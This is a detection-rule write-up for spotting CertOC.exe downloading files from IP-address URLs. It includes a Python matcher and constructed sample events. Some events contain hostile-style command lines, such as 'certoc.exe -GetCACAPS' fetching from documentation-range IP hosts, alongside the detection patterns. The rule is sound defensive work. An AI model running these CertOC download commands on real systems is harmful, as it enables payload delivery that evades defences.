File Download From IP Based URL Via CertOC.EXE

Summary
This detection rule monitors the execution of CertOC.exe on Windows systems to identify file downloads from IP-based URLs. CertOC.exe is a legitimate Windows utility that attackers misuse for command-and-control activity or file exfiltration. The rule focuses on instances where the command line indicates a download from a URL whose host is written as an IP address rather than a domain name. The detection logic checks for usage of CertOC.exe together with the command-line argument typically used for downloading data, `-GetCACAPS`. By monitoring these attributes, the rule helps identify potentially harmful activity that could compromise a system's security. Given the nature of downloads from direct IP addresses, the rule aims to mitigate threats related to unauthorized data retrieval and enhance endpoint protection. The rule's high severity level indicates a strong likelihood of malicious action when it triggers, warranting further investigation.
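The matching logic described above, written out as an added Python example (not the Sigma rule's own YAML), run over constructed process-creation events. It assumes Sigma's process_creation field names (`Image`, `OriginalFileName`, `CommandLine`); matching on `OriginalFileName` in addition to `Image` is my assumption, added so a renamed copy of the binary is still caught.

```python
import re
from typing import Dict, Iterable, List

# URL whose host is a dotted-quad IPv4 address rather than a domain name:
# "://" followed by four 1-3 digit groups, not followed by more digits or dots.
IP_URL_RE = re.compile(r"://(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def is_certoc_ip_download(event: Dict[str, str]) -> bool:
    """True when a process-creation event matches the rule: certoc.exe invoked
    with -GetCACAPS and an IPv4-based URL on the command line."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()   # assumption: also checked
    cmdline = event.get("CommandLine", "")
    if not (image.endswith("\\certoc.exe") or original == "certoc.exe"):
        return False
    if "-getcacaps" not in cmdline.lower():   # Sigma 'contains' is case-insensitive
        return False
    return IP_URL_RE.search(cmdline) is not None


def triage(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return only the events that the rule would alert on."""
    return [e for e in events if is_certoc_ip_download(e)]


# Constructed sample events (not real telemetry); IPs are documentation ranges.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certoc.exe", "OriginalFileName": "CertOC.exe",
     "CommandLine": "certoc.exe -GetCACAPS http://192.0.2.10/update.txt"},      # IP host: fires
    {"Image": r"C:\Windows\System32\certoc.exe", "OriginalFileName": "CertOC.exe",
     "CommandLine": "certoc.exe -GetCACAPS http://pki.example.test/caps"},       # domain host: no fire
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil.exe -urlcache http://192.0.2.10/x"},               # different binary: no fire
    {"Image": r"C:\Temp\renamed.exe", "OriginalFileName": "CertOC.exe",
     "CommandLine": "renamed.exe -getcacaps https://198.51.100.7:8443/c"},       # renamed copy: fires
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print("ALERT:", hit["CommandLine"])
```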
Categories
  • Windows
  • Endpoint
Data Sources
  • Process
  • Command
Created: 2023-10-18